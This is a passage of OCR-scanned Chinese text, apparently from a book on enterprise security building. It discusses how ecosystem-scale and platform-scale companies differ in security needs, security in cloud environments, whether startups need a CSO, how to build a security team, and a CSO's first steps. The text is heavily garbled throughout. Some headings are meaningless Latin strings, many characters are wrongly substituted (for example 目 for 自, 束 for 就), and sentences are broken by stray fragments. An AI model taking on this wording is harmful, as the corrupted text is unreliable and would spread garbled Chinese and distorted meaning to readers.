15 ”生态 级 企业 vs 平台 级 企业 安全 建设 的 需求 


生态 级 企业 和 平台 级 企业 之 则 的 安全 建设 需求 不 仅仅 是 量 的 差别 
而 是 质 的 差别 。 


1. AEA A PEAR 


主要 差别 表现 在 是 否 大量 地 进入 目 己 造 轮 子 的 时 代 ， 即 安全 建设 
需要 依托 于 目 研 ， 而 非 采 用 商业 解决 方案 或 依赖 于 开源 工具 的 实现 。 


那么 平台 级 公司 和 生态 级 公司 的 区 别 又 在 哪里 ” 从 表象 上 看 ， 生 
态 级 公司 的 大 型 基础 架构 如 果 用 传统 的 安全 方案 几乎 都 无 法 满足 ， 所 
以 会 大 量 的 进入 目 研 。 而 平台 级 公司 则 会 依赖 开源 工具 更 多 一 些 ， 不 
会 对 所 有 解决 方案 场景 下 的 安全 工具 进行 目 研 。 如 果 有 预算 也 会 优 移 
投 在 “业务 安全 ” 侧 ， 比 如 反 欺 诈 平 台 等 等 ， 而 不 会 目 己 去 搞 入 侵 检 
测 。 当 然 ， 这 有 可 能 十 个 伪 命 题 ， 有 可 能 随 厦 时 间 的 推移 ， 乙 方 公司 
也 开始 提供 具有 可 扩展 性 、 能 应 对 分 布 式 染 构 的 方案 ,或 者 当时 间 尺 
度 拉 得 长 一 点 ， 平 台 级 公司 每 年 在 目 研 上 投入 一 点 点 ， 多 年 之 后 也 具 
备 了 BAT 级 别 的 安全 能 力也 并 非 完全 不 可 能 。 不 过 这 些 都 是 理想 状 
况 ， 现 实 总 是 受 到 多 方面 因素 制约 的 。 


2.72 Fl A AA 


E TAL EBON ITE REE TED OL RRE, 
平台 级 公司 和 生态 级 公司 都 是 以 PC 端 Web 服 务 为 入 口 的 平台 应 用 和 以 
移动 端 APP 入 口 的 移动 应 用 。 有 的 依赖 于 一 些 PC 客 户 端 或 移动 端 偏 底 
层 的 APP， 但 在 技术 实现 方式 上 ， 平 台 级 公司 更 多 地 直接 使 用 或 少量 
修改 开源 软件 ， 而 生态 级 公司 的 IT 基础 设施 则 会 类 似 于 Google 的 三 篇 
论文 一 样 ， 不 仅仅 停留 在 使 用 和 少量 修改 ， 而 是 会 进入 自己 造 轮子 的 
阶段 。 其 中 所 造 的 轮子 是 否 对 业界 有 意义 这 种 问题 暂时 不 去 评价 ， 但 
对 应 的 安全 建设 则 反映 出 平台 级 公司 的 安全 主要 围绕 应 用 层面 ， 而 生 
态 级 公司 的 安全 会 覆盖 基础 架构 和 应 用 层面 两 块 。 直 接 使 用 开源 工具 
的 部 分 交 给 社区 去 处 理 ， 上 自己 跟 进 打 补 本 就行 了 ， 但 如 果 是 目 己 开发 
的 ， 那 么 束 需 要 自己 去 解决 一 揽 子 的 安全 问题 ， 比 如 Google 造 了 
Android 这 个 轮子 ， 那 Android 一 系列 的 安全 问题 Google 需 要 自己 解 
决 ， 比 如 阿里 自己 去 搞 了 一 个 ODPS， 那 阿里 的 牛人 也 需要 解决 这 
个 ， 再 比如 华为 在 物 联网 领域 造 了 LiteOS 这 个 轮子 ， 自 然 也 要 去 处 理 
对 应 的 问题 ， 而 这 些 偏 底层 的 问题 显然 早已 超出 应 用 安全 的 范畴 ， 也 
不 是 一 般 的 甲 方 安全 团队 有 能 力 应 对 的 。 其 实 有 些 平 台 级 公司 也 是 发 
明了 一 些 轮子 的 ， 比 如 自动 化 运 维 工 具 ， 比 如 一 些 NOSQL ， 不 过 IDC 
规模 两 者 之 间 仍 然 差 得 比较 远 ， 上 层 的 业务 复杂 度 也 有 差距 ， 支 持 的 
研发 团队 的 规模 也 有 差距 ， 对 安全 工具 的 自动 化 能 力 和 数据 处 理 规模 
仍然 存在 阶梯 级 的 差别 ， 这 一 点 也 决定 了 为 什么 要 上 自 研 。 安 全 其 实 只 
是 IT 整体 技术 建设 的 一 个 子 集 ， 当 整体 技术 架构 和 实现 方式 进入 自 产 


目 销 阶 段 时 ， 安 全 建设 也 必然 进入 这 个 范畴 。 对 于 很 多 实际 上 依靠 业 
务 和 线 下 资源 驱动 而 非 技术 驱动 的 互联 网 公司 而 言 ， 安 全 建设 去 做 太 
多 高 大 上 的 事情 显然 是 没有 必要 的 。 


第 二 个 因素 是 钱 ， 钱 也 分 为 两 个 方面 : 1) 成 本 ; 2) ROI。 假 设 
安全 投入 按 IT 总 投入 的 固定 10% 算 ， 又 假设 生态 级 公司 的 安全 建设 成 
本 十 平台 级 公司 的 5~10 倍 ， 这 个 成 本 除了 市 宽 、IDC 服 务 需 软 硬 件 之 
外 ， 还 有 技术 团队 ， 加 起 来 才 是 总 拥有 成 本 TCO。10 个 人 的 安全 团队 
和 100 个 人 的 安全 团队 能 做 的 事情 相 蕾 太 大 ， 具 体 可 以 参考 我 在 知 乎 上 
的 帖子 “为 什么 从 事 信 息 安全 行业 一 定 要 去 大 公司 ? ”。 还 有 一 方面 则 
类 似 于 “去 IOE”， 上 面 提 到 目前 对 于 大 型 互联 网 没有 合适 的 安全 解决 
方案 ， 即 使 有 ， 这 个 成 本 可 能 也 会 无 法 接受 ， 所 以 假如 乙方 公司 能 推 
出 既 能 文 撑 业 务 规模 ， 又 具有 性 价 比 的 方案 ， 我 认为 甲 方 安全 团队 真 
的 没有 必要 再 去 造 论 于 了 。 


第 三 个 因素 是 人 。 人 安全 团队 的 人 员 数 量 也 只 是 一 个 很 表面 的 数 
字 ， 安 全 团队 的 构成 才 是 实力 ， 能 围 到 大 牛 的 安全 团队 和 由 初级 工程 
师 组 成 的 安全 团队 显然 是 不 一 样 的 ， 首 先前 者 的 成 本 不 是 所 有 的 公司 
都 能 接受 ， 其 次 ， 平 台 不 够 大 即使 大 牛 来 了 也 未 必 有 用 武之 地 。 大 多 
数 平台 级 公司 中 安全 团队 的 知识 和 经 验 集 中 在 Web/App、 应 用 层 协 

容器 、 中 间 件 和 数据 库 ， 生 态 级 公司 则 扩展 至 系统 底层 、 二 


议 、Web 容 器 、 


进 制 、 运 行 时 环境 和 内 核 级 别 ， 能 力 积累 也 存在 差别 。 这 里 并 无 讲 岂 
之 意 ， 仅 在 说 明 业 务 对 技术 的 需求 不 一 样 。 


3.°F BRAS] A EAP 


那么 ， 平 台 级 公司 在 安全 建设 上 是 不 是 就 没有 乐趣 呢 ? 其实 这 类 
公司 也 玩 一 些小 花样 ， 比 如 修改 SSHD、LVS， 加 入 一 些 安全 特性 。 可 
能 也 会 目 己 定制 一 个 WAF， 或 者 搞 搞 日 志 的 大 数据 分 析 。 但 比如 涉及 
DPI、 全 流量 入 侵 检测 、SDN、 内 核 级 别 的 安全 机 制 ， 基 本 上 都 不 会 
介入 ， 对 于 一 个 规模 不 是 特别 大 的 平台 级 公司 的 甲 方 安全 团队 而 言 ， 
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生态 级 公司 是 不 是 全 领域 进军 目 己 造 轮子 呢 ? 也 不 是 ， 主 要 工作 
还 是 在 入 侵 检 测 、WAF、 扫 摘 釉 、 抗 DDoS、 日 志 分 析 等 领域 。 在 SDL 
环节 上 可 能 也 会 目 己 研 发 些 工具 ， 但 很 与 比 直接 使 用 商业 工具 更 短 平 
快 。 阿 里 钱 盾 、 腾 讯 管家 、 百 度 杀毒 这 些 都 跟 360 客 户 问 一 样 与 生产 网 
络 没 什么 关系， 束 不 去 讲 了 。 男 外 目 研 工具 有 一 个 原则 :都 限定 在 “ 民 
用 ”领域 ,不 会 日 己 去 发 明 一 个 RSA 算 法 这 样 的 东西 。 


国内 的 平台 级 公司 里 也 有 一 个 例外 ， 数 字 公 司 ， 因 为 其 主 营 业务 
苹 信 息 安全 ， 所 以 就 没有 安全 投 痪 固定 占 比 理论 的 影响 。 


1.6” 云 环境 下 的 安全 变迁 


云 计算 的 本 质 是 改变 企业 需求 方 通过 传统 的 渠道 获取 IT 资源 的 形 
式 。 传 统 的 方式 是 一 个 企业 假如 要 构建 信息 化 的 能 力 ， 必 须要 采购 硬 
件 ， 采 购 软件 ， 维 护 一 个 较 大 的 IT 团队 ，TCO 很 高 。 但 是 ， 到 了 云 计 
算 时 代 ， 这 一 切 你 都 不 需要 ， 你 只 要 轻 点 鼠标 就 可 以 获取 大 量 的 计 
算 、 存 储 和 网 络 人 资源 ， 并 且 不 再 需要 专门 的 人 员 去 IDC 机 房 维护 服务 
器 ， 不 需要 大 量 的 运 维 人 员 ， 甚 至 某 些 通用 的 应 用 开发 都 省 了 ， 你 可 
以 将 手头 的 IT 预算 用 于 最 需要 的 部 分 一 完全 聚焦 于 目 己 的 业务 ， 而 不 
用 费 大 量 的 精力 维护 基础 设施 ， 甚 至 资源 的 获取 变 得 弹性 : 需要 时 轻 
易 获 取 大 量 甚 至 海量 的 计算 资源 ， 用 完 后 可 以 及 时 释放 ， 不 用 担心 资 
产 朵 置 和 老化 。 在 IT 产业 的 销售 模式 中 被 颠覆 的 一 环 是 ， 传 统 企业 不 
再 直接 购买 服务 器 存储 商业 数据 库 ， 而 是 通过 云 计算 平台 获取 。 同 样 
地 安全 到 了 云 计 算 时 代 ， 企 业 客 户 会 更 希望 通过 云 化 的 方式 来 获取 和 
整合 安全 的 解决 方案 ， 例 如 SaaS (Security as a Service) ， 这 就 要 求 安 
全 产品 或 解决 方案 本 身 需 要 支持 虚拟 化 、 软 件 化 、 分 布 式 、 可 扩展 
性 ， 并 且 利 用 大 数据 和 人 工 智能 ， 利 用 云端 无 限 的 计算 和 存储 能 
缓解 传统 安全 解决 方案 中 数据 的 离散 、 单 点 的 计算 能 容 不 足 ， 信 息 孤 
岛 和 无 法 联动 等 问题 。 


1. 云 的 租户 


对 使 用 云 的 租户 而 言 ， 云 平台 自身 以 及 应 用 超市 Marketplace (类 
似 APP store) 集成 了 各 个 安全 厂商 的 云 安全 产品 以 及 可 托管 的 安全 专 
家 服务 。 如 采 目 身 没 有 太 强 烈 地 要 主导 安全 实践 的 意愿 ， 通 币 情 况 下 
通过 应 用 超市 和 云 平台 免费 提供 的 安全 功能 束 可 以 快速 构建 基础 的 安 
全 能 力 。 如 果 布 望 得 到 进 阶 的 安全 防护 ， 则 必须 目 己 进 一 步 动 手 。 


2. 云 安全 提供 商 


在 传统 的 安全 方案 中 ， 安 全 三 商 以 提供 硬件 安全 产品 和 安全 服务 
为 主 ， 而 在 云 环境 下 ， 硬 件 形 式 的 安全 方案 会 越 来 越 不 合拍 ， 与 之 相 
比 ， 把 竞争 力 构 建 在 软件 层面 的 安全 方案 会 成 为 云 上 的 主流 。 相 比 过 
去 面对面 提供 安全 服务 ， 现 在 则 转变 为 在 租户 侧 部 署 各 种 安全 传 感 
硬 ， 通 过 在 云 剖 汇 取 安 全 度量 数据 ， 结 合 威 胁 情 报 或 由 专家 解读 数据 
来 提供 可 管理 的 一 站 式 安全 服务 。 
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第 2 草 ”安全 的 组 织 


很 多 人 忽略 组 织 ， 但 实际 上 组 织 是 比 技术 和 流程 更 重要 的 东 
西 ,“ 人 "是 所 有 问题 的 决定 性 因素 。 本 章 就 讲 一 下 安全 组 织 中 的 人 。 


2.1 创业 型 企业 一 定 需 要 CSO 吗 


1. 招 聘 方 的 诉求 


当下 不 少 创业 型 公司 都 在 找 CSO， 也 有 找到 我 的 ， 就 顺带 分 享 一 
下 我 对 这 个 问题 的 思考 。 首 先 这 个 问题 即便 是 对 同一 个 人 而 言 可 能 答 
案 也 会 因 时 而 变 ， 其 次 CSO 只 是 一 个 代表 性 的 称呼 ， 大 家 不 要 过 于 纠 
结 一 定 要 做 什么 事 才 算 CSO，CSO 和 CISO 又 有 什么 区 别 之 类 的 ， 在 这 
个 语 境 下 用 来 指 代 招 聘 方 想 找 拥有 全 局 安全 管理 经 验 的 人 ， 甚 至 最 好 
征 货 深 的 从 业者 ， 他 能 市 一 文 哪怕 是 儿 个 人 的 安全 团队 ， 并 能 把 安全 
相关 的 事 全 部 所 过 去 。 


2. 不 同 阶段 的 需求 


对 于 尚 在 天 使 融资 阶段 ， 找 个 CSO 大 多 就 是 去 忽悠 投资 人 的 ， 通 
俗 一 点 理 解 束 是 竣 一 文 履历 光鲜 的 队伍 去 “ 矣 钱 ”。 能 不 能 做 事情 这 个 
很 难说 ， 也 不 能 说 人 家 一 定做 不 了 事情 ， 这 种 只 能 事后 诸 饮 亮 的 瘟 根 
定论 ， 随 便 说 人 不 知 谱 也 是 不 负责 任 的 ， 不 过 我 想 对 于 大 多 数 有 不 错 
岗位 的 人 而 言 应 该 是 不 会 去 的 。 


对 于 拿 到 A 轮 、B 轮 投资 的 阶段 ， 业 务 方向 已 被 证 明 ， 业 务 量 不 大 
但 进入 快速 成 长 期 ， 问 题 层出不穷 。CEO 和 和 CTO 觉得 头疼 并 且 想 把 这 


部 分 压力 转嫁 出 去 ， 理 论 上 有 是 应 该 找 一 个 懂 安 全 的 人 的 ， 但 是 现在 这 
个 时 间 点 〈 也 就 是 2016 年 ) 真 的 不 是 一 个 好 时 间 ， 在 当下 很 多 公司 用 
数 百 万 也 经 常 找 不 到 合适 的 CSO， 创 业 型 公司 要 在 这 个 时 间 点 上 和 争夺 
安全 人 才 真 的 是 很 素 的 一 件 事 。 建 议 找 2~3 个 靠 谱 的 安全 工程 师 ， 然 
后 CTO (技术 总 监 ) 、 运 维 Leader、 开 发 的 架构 师 这 几 个 角色 快速 补 
一 太 安 全 的 知识 和 方法 论 ， 哪 伯 是 充当 救火 队长 赶 鸭子 上 架 ， 大 家 配 
合 一 下 ， 应 该 也 能 把 安全 撑 起 来 ， 不 一 定 非 要 找 一 个 大 牛 级 的 CSO， 
因为 有 时 候 业 务 量 没 那么 大 规模 ， 不 一 定 需要 很 高 级 别 的 人 ， 且 创业 
型 公司 为 了 保持 目 己 的 鲜 活 也 不 需要 套用 大 公司 的 流程 和 方法 ， 做 好 
基础 的 运 维 安全 ， 代 码 安全 ， 加 强 一 些 安全 意识 ， 不 出 问题 的 时 候 腾 
出 时 间 来 研究 一 下 下 一 步 怎 么 做 ， 跟 时 间 和 业务 增长 速度 赛跑 ， 跑 着 
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全 领域 的 朋友 层 意 帮 你 出 谋划 策 ， 偶 尔 回 答 一 下 安全 建设 如 何 做 这 类 
问题 ， 其 实 那 CSO 的 需求 也 束 解 决 了 ， 代 价 只 是 请 吃 儿 顿 饭 。 


对 于 拿 到 C 轮 、D 轮 、E 轮 投资 的 阶段 ， 业 务 初 具 规模 ， 开 始 旨 更 
高 的 目标 冲刺 ， 同 时 能 给 人 画 更 多 的 “ 饼 ”， 如 果 之 前 已 经 招 到 徘 谱 的 
安全 工程 师 ， 那 这 个 时 候 应 该 已 经 成 长 起 来 ， 承 担 起 Leader 的 角色 ， 
通常 也 不 需要 从 外 部 招 cCSO 了。 这 个 时 候 想 从 外 部 招 CSO 的 都 是 之 前 
主观 的 或 被 迫 的 不 太 重 视 安全 ， 出 了 问题 才 想 妥 头 痛 医 头 脚 痛 医 脚 。 
这 个 时 候 的 业务 形态 跟 大 公司 比 应 该 是 “麻雀 昌 小 五 脏 俱全 ”， 安 全 管 
理 上 应 该 是 有 很 多 相似 的 地 方 了 ， 对 于 初 具 规模 的 业务 而 言 安 全 管理 


的 经 验 很 重要 ， 可 以 直接 从 大 公司 挖 人 。 当 然 了 级 别 较 高 的 人 信 计 还 
古 控 不 动 的 ， 能 控 动 的 主要 束 是 骨干 那 一 层 的 人 吧 。 通 党 你 需要 容 怒 
他 们 业务 上 有 深度 但 不 一 定 面面俱到 ， 很 可 能 情商 和 管理 能 力也 差 强 
人 意 ， 不 过 能 解决 你 的 问题 束 行 ， 面 面 俱 到 的 人 才 毕 苋 还 古 太 贵 了 。 
对 于 那些 佑 值 超过 100 亿 美元 的 创业 型 公司 ， 还 是 建议 找 高 端 人 才 。 


对 于 准备 冲 IPO 的 阶段 ， 这 个 时 候 想 必 不 会 赛 中 画 汐 ， 如 果 你 是 
这 类 公司 的 CXO， 还 为 找 不 到 人 感慨 万 千 ， 我 想 也 许 是 心态 还 不 够 开 
放 ， 炙 或 许 是 给 人 的 “诚意 ”还 不 够 ， 对 此 我 也 给 不 了 太 多 建议 了 ， 毕 
竞 市 场 上 高 级 人 才 只 有 那么 一 小 报 人 ， 来 不 来 ， 去 不 去 取决 于 那 一 小 
气 人 的 意愿 ， 被 打动 了 目 然 来 ， 没 被 打动 的 目 然 不 去 。 


3. 创 业 型 企业 的 挑 成 


对 选择 转 会 的 CSO 去 创业 公司 是 否 有 挑战 ? 有 ， 也 没有 。 首先 做 
的 事情 往往 还 是 从 头 建 团队 ， 把 过 去 建设 安全 体系 的 过 程 从 零 开始 再 
做 一 过 ， 从 这 个 角度 讲 重 复 过 去 做 的 事情 尽管 业务 有 所 不 同 但 过 程 和 
结 采 上 未 上 必 有 挑战 。 有 ”挑战 ?的 反而 是 如 何在 创业 公司 的 条 件 下 招 筋 
成 员 ， 维 系 团 队 ， 在 很 多 流程 及 界限 不 分 明 的 情况 下 推动 事情 落地 ， 
仅 此 而 已 。 对 CSO 本 人 而 言 得 到 的 实践 机 会 未 必 有 大 公司 多 而 广 ， 因 
为 安全 是 一 个 随 企业 规模 而 复杂 化 的 工作 。 但 是 ， 如 果 你 是 CSO 的 跟 
班 小 弟 ， 那 你 可 能 是 成 长 最 快 得 到 锻 炬 最 多 的 人 ， 因 为 你 经 历 了 安全 


建设 从 无 到 有 飞速 发 展 ， 从 简单 到 自动 化 的 过 程 ， 这 个 过 程 不 是 人 人 
都 能 经 历 的 ， 如 果 你 进入 BAT 在 一 个 很 细 的 分 支 上 耕耘 几 年 未 必 能 积 
累 到 这 种 “全 局 视野 "， 相 反 在 这 种 环境 下 才能 快速 积累 。 所 以 除非 公 
司 IPO，CSO 都 不 是 团队 里 收益 最 大 的 人 ， 但 跟班 小 弟 却 是 最 大 的 启 
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2.2 如 何 建立 一 支 安全 团队 


如 果 要 去 一 家 公司 领衔 安全 建设 ， 第 一 个 问题 就 是 如 何 建立 安全 
团队 。 上 面 所 到 不 同 的 公司 状况 对 应 的 安全 建设 需求 是 不 一 样 的 ， 需 
要 的 安全 团队 也 是 不 一 样 的 ， 所 以 我 按 不 同 的 场景 来 深入 分 析 这 个 问 


题 。 


目前 国内 的 市 场 中 ，BAT 这 种 公司 基本 是 不 需要 组 团队 的 ， 对 
安全 负责 人 有 需求 的 公司 大 约 是 从 准 生 态 级 互联 网 公司 、 平 台 级 互联 
网 公司 、 大 型 集团 的 互联 网 +， 到 千 千 万 万 的 互联 网 创业 型 公司 。 


1. 极 客 团队 


如 果 你 在 一 个 小 型 极 客 型 团队 ， 例 如 Youtube 被 Google 收 购 前 只 有 
17 个 人 ， 在 这样 的 公司 里 你 目 己 殉 是 安全 团队 ， 丛 称 “one man 
army”。 此 时 一 切 头 衔 背 浮 云 ， 需 要 的 只 是 一 个 全 栈 工 程 师 。 


2. 创 业 型 企业 


对 于 绝 大 多 数 创业 型 企业 而 言 ， 束 像 之 前 所 说 的 ，CSO 不 一 定 需 
要 ， 你 拉 两 个 小 伙伴 一 起 去 干 活 束 行 了 ,今天 BAT 的 安全 尽 监 们 ， 当 
年 也 都 是 干 活 的 工程 师 小 伙伴 ，10 多 年 过 去 了 ， 工 程 师 熬 成 了 “CSO 大 
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3. 不 同 的 能 力 类 型 


搞 安 全 的 人 现在 其 实 不 好 招 ， 很 多 企业 都 招 不 到 安全 负责 人 ， 所 
以 会 有 一 堆 没 有 甲 方 安全 实 操 经 验 或 者 没有 整体 安全 经 验 的 人 被 推 上 
安全 团队 领导 的 岗位 。 对 绝 大 多 数 公 司 而 言 ， 安 全 建设 的 需求 都 是 聚 
焦 于 应 用 的 ， 所 以 安全 团队 必然 也 是 需要 偏 网 络 和 应 用 的 人 。 大 牛 显 
然 是 没 必 要 的 ， 而 仅 渗 透 ， 有 一 定 网 络 系统 应 用 攻防 理论 基础 的 人 是 
最 具 培 养 价值 的 。 除 此 之 外 乙方 的 咨询 顾问 、 搞 安全 标准 的 、 售 前 售 
后 等 在 这 个 场景 下 的 培养 成 本 都 很 高 ， 不 具有 短期 ROI， 所 以 都 不 会 
征 洪 在 的 候选 者 。 在 安全 撤 术 领域 里 ， 其 实 只 有 两 类 人 会 有 长 期 发 展 
潜力 : 第 一 类 是 酷爱 攻防 的 人 ， 对 绕 过 与 阻 断 有 着 天 生 的 兴趣 ; 第 二 
类 就 是 可 能 不 是 很 热爱 安全 ， 但 是 CS 基础 极 好 的 程序 员 ， 这 一 类 人 放 
哪里 都 是 牛人 ， 第 一 类 则 跟 行 业 相 关 。 狙 俗 一 点 儿 的 说 法 找 几 个 小 器 
客 束 能 做 企业 安全 了 ? 这 种 观点 是 不 是 有 人 会 觉得 偏 科 的 厉害 了 。 确 
实 我 也 认为 会 渗透 跟 做 企业 安全 的 系统 性 建设 之 间 还 是 有 比较 大 的 鸿 
沟 的 。 仪 仅 古 说 在 有 限 选 择 的 情况 下 ， 假 如 你 不 像 某 些 土 蚂 公 司 一 样 
随便 焉 能 招 到 高 手 ， 那 么 可 选 的 奉 代 方案 中 最 具 可 行 性 和 性 价 比 的 是 
什么 ， 之 所 以 选 会 渗透 全 攻防 的 人 ， 那 是 因为 这 类 人 具备 了 在 实践 层 
面 而 不 是 理论 层面 真正 理解 安全 工作 的 基础 ， 在 此 基础 上 去 培养 是 非 
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常 快 的 ， 策 略 、 流 程 、 标 准 、 方 法 论 可 以 慢 慢 学 ， 因 为 这 些 都 不 是 救 
火 时 最 需要 的 扩 能 ， 而 是 在 和 平年 代 且 规模 较 大 的 公司 才 需 要 的 东 
西 。 看 有 些 公 司 的 招聘 工程 师 的 要 求 里 还 写 大 要 证 书 什么 的 ， 不 蔡 感 
慨 一 下 ， 很 多 能 做 事 的 “少年 "其实 根本 没有 证 书 ， 有 证 书 的 人 通常 适 
合 去 做 乙方 的 售 前 而 不 是 甲 方 的 安全 工程 师 。 甲 方 招聘 有 要求 证书 的 ， 
基本 上 都 是 传统 企业 ， 互 联网 企业 这 么 写 的 应 该 怀疑 一 下 那里 的 整体 
水 平 。 当 然 ， 这 个 说 法 对 安全 人 负 员 人 的 招聘 不 成 立 ， 因 为 国内 的 CTO 
很 少 有 懂 安 全 的 ， 招 聘 者 其 实 也 不 知道 安全 总 监 到 必需 要 哪些 技能 ， 
随便 拷贝 了 一 个 也 很 正常 ， 高 端 职位 的 JD (职位 描述 ) 很 多 时 候 都 是 
模糊 的 ， 除 了 一 个 头衔 之 外 ， 其 他 都 要 聊 了 才 知 道 ， 这 时 候 你 束 不 要 
去 嫌弃 人 DD 怎么 写 的 这 么 差 ， 毕 苋 老板 也 不 懂 这 事 该 怎么 做 ， 找 你 就 是 
为 了 解决 这 个 问题 。 


单纯 攻防 型 的 人 在 前 期 培养 比较 快 ， 但 当 安 全 团队 随 着 公司 规模 
和 业务 快速 成 长 时 ， 思 维 过 于 单 点 的 人 可 能 会 出 现 “ 尊 有 贷 *”。 后 面 会 提 
到 安全 建设 实际 上 有 十分 阶段 的 ， 而 且 是 系统 性 的 ， 视 野 和 思路 开阔 的 
人 会 从 工程 师 中 脱 蜂 出 来 ， 成 为 安全 团队 的 领导 。 


4. 大 型 企业 


对 于 比较 大 型 的 平台 级 公司 而 言 ， 安 全 团队 会 有 些 规模 ， 不 只 是 
需要 工程 师 ， 还 需要 有 经 验 的 Leader， 必 须要 有 在 运 维 安 全 ，PC 端 


Web 应 用 安全 以 及 移动 端 App 安 全 能 独当一面 的 人 ， 如 采 业 务 安全 尚 有 
空 日 地 带 的 话 ， 还 需要 筹建 业务 安全 团队 。 


5. 超 大 型 企业 


准 生 态 级 公司 建安 全 团队 这 种 需求 比较 少 ， 但 因为 笔者 曾 被 问 及 
这 样 的 问题 ， 所 以 束 把 思考 的 结果 写 出 来 。 对 于 这 种 级 别 的 公司 ， 由 
于 其 业务 线 比较 长 ， 人 研发 团队 规模 通 音 也 比较 庞大 ， 人 整个 基础 架构 也 
构建 于 类 似 云 计算 的 底层 架构 之 上 〈 姑 且 称 之 为 私有 云 吧 ) ， 光 有 应 
用 安全 的 人 十 不 够 的 ， 安 全 的 领头 人 必须 目 己 对 企业 安全 理解 够 深 ， 
Leader 这 一 级 必须 对 系统 性 的 方法 论 有 足够 的 了 解 。 随 便 举 些 例子 ， 
1) 在 出 安全 事件 时 如 琳 Leader 的 第 一 反应 是 直接 让 八 上 机 器 去 查 后 门 
的 ; 2) 对 运 维 系统 变更 风险 不 了 解 的 ，3) 对 在 哪 一 层 做 防御 性 价 比 
最 高 不 熟悉 的 ，4) 不 明白 救火 和 治 病 的 区 别 的 (这 种 思路 会 一 度 体现 
在 提 的 安全 整改 建议 上 ) ， 诸 如 此 类 的 状态 去 担任 Leader 束 会 比较 吃 
H (Leader 上 面 的 安全 老大 目 然 也 会 很 吃力 ) 。 另 外 Leader 的 跨 组 织 
沟通 能 力 应 该 比较 高 ， 在 这 种 规模 的 公司 ， 不 是 你 的 安全 梨 略 提 的 正 
确 束 一 定 会 被 人 接受 的 。 团 队 里 还 应 该 有 1~2 个 大 牛 级 信物， 所 以 市 
队 人 目 己 应 该 是 在 圈 内 有 影 啊 力 的 人 ， 人 否则 这 些 事情 实践 起 来 都 很 
难 。 


实际 上 当 你 进入 一 个 平台 级 公司 开始 ， 安 全 建设 早已 不 是 一 项 纯 
技术 的 工作 ， 而 技术 管理 上 的 系统 性 思路 会 影响 整个 安全 团队 的 投入 
E 


第 3 章 ” 甲 方 安全 建设 方法 论 


那些 国际 安全 标准 、 模 型 和 理论 已 经 讲 了 千 万 和 志 ， 方 法 论 的 东西 
也 许 是 好 东西 ， 但 是 一 般 人 可 能 都 没 时 间 去 读 完 ， 有 时 候 也 会 觉得 理 
论 脱离 实践 ， 所 以 本 章 讲 的 方法 论 部 从 是 实 操 出 发 的 。 


3.1 ”从 零 开始 


本 篇 谈 一 下 CSO 上 任 之 初 要 做 些 什么 吧 。 很 多 没 做 过 甲 方 安全 的 
人 也 许 都 没有 头绪 ， 或 者 你 只 是 接触 甲 方 安全 的 一 个 细 分 领域 而 不 是 
全 貌 ， 也 许 我 说 的 能 为 你 省 点 脑 汗 ， 因 为 开始 是 最 难 的 ， 等 过 了 这 个 
阶段 找到 了 感 常 ， 后 面 的 路 就 平坦 了 。 


LZ 


上 任 之 初 你 需要 三 张 表 。 第 一 张 表 : 组 织 结构 图 ， 这 些 是 开展 业 
务 的 基础 ， 扫 视 一 下 组 织 结构 中 每 一 块 安全 工作 的 干系 人 。 例 如 行 
政 、HR、 财 务 部 门 是 跟 公 司 层 面 信息 安全 管理 的 全 局 性 制度 的 制定 和 
发 布 相关 的 部 门 ， 内 部 审计 也 跟 其 强 相 关 ; 基础 架构 的 运 维 团队 ， 运 
维 安全 相关 的 要 跟 他 们 合作 ;研发 团队 ， 可 能 在 组 织 结构 中 分 散 于 各 
个 事业 部 、 各 产品 线 ， 不 一 定 叫 研发 ， 但 本 质 都 是 产品 交付 的 团队 ， 
应 用 安全 和 基础 服务 器 软件 安全 相关 的 要 找 他 们 ， 也 是 SDL 实 施 的 主 
要 对 象 ， 运 宫 、 市 场 、 客 服 类 职能 他 们 可 能 没有 直接 的 系统 权限 ， 但 
是 会 有 一 些 诸如 CMS 的 后 合 权 限 (被 社工 的 对 象 ，， 广 告 的 引入 发 布 
(#4 Miframe, RHE) 等 乱七八糟 的 安全 问题 的 关联 者 ， 他 们 也 有 是 
某 些 重大 安全 事件 上 升 到 社会 影响 的 危机 管理 的 公关 部 门 ; (大 ) Be 
据 部 门 ， 因 为 安全 也 要 用 到 大 数据 ， 是 复 用 一 套 技术 架构 还 古 目 己 


搞 ， 这 个 取 雇 于 每 个 公司 的 实际 状况 ， 有 的 自己 搞 ， 有 的 则 复 用 ; 产 
品 部 门 ， 一 些 跟 业务 安全 和 风 控 相关 的 安全 建设 要 跟 他 们 合作 ; 
CXOs: 这 里 泛 指 组 织 中 的 决策 层 ， 什 么 问题 要 借助 他 们 上 自己 拿捏 吧 ， 
INJA) o 


第 二 张 表 : 每 一 个 线 上 产品 〈 服 务 ) 和 交付 团队 (包括 其 主要 负 

) 的 映射 。 这 张 图 实际 就 是 缩水 版 的 问题 响应 流程 ， 是 日 常安 全 
问题 的 窗口 ， 漏 洞 管理 流程 主要 通过 这 些 渠 道 去 推动 ， 一 个 安全 团队 
的 Leader 通 常 需 要 对 应 于 一 个 或 看 干 产品 的 安全 改进 。 不 过 这 里 也 要 
分 一 下 权重 ， 比 如 支撑 公司 主要 宫 收 的 产品 需要 一 个 主力 小 团队 去 负 
责 其 SDL 全 过 程 ， 而 边缘 性 的 产品 一 个 小 团队 可 以 并 发 承接 好 几 个 甚 
至 10 个 以 上 的 产品 ， 粒 度 相 对 粗 一 点 过 滤 主 要 的 安全 问题 即 可 。 通 第 
这 样 做 符合 风险 管理 方法 论 ， 但 对 于 深 知 大 公司 病 又 创业 过 的 我 来 
说 ， 还 是 稍 微 有 些 补充 的 看 法 ， 很 多 成 长 中 的 业务 ， 出 于 起 步 阶段 ， 
没有 庞大 的 用 户 群 ， 可 能 得 不 到 公共 职能 部 门 的 有 力 扶持 ， 例 如 运 
维 、 安 全 等 ， 明 日 之 星 的 业务 完全 可 能 被 扼杀 在 播 篮 里 ， 这 种 时 候 对 
有 责任 心 的 安全 团队 来 说 如 何 带 着 VC 的 眼光 选择 性 的 投入 是 一 件 很 有 
意思 的 事 。 在 一 个 公司 里 是 安全 团队 的 话语 权 大 还 是 文 柱 产 品 线 的 话 
语 权 大 ? 当然 是 文 柱 产 品 ， 等 产品 成 长 起 来 了 青 去 补 安全 的 课 这 种 事 
后 诸 欧 亮 的 事情 谁 都 会 做 ， 等 业务 成 长 起 来 后 目 己 都 能 去 建安 全 团队 
了 ， 不 一 定 再 需要 公共 安全 团队 的 支持 。 锦 上 添 化 还 是 雪 中 送 谋 ， 业 
务 团 队 的 这 种 感受 最 后 也 会 反馈 给 安全 团队 。 


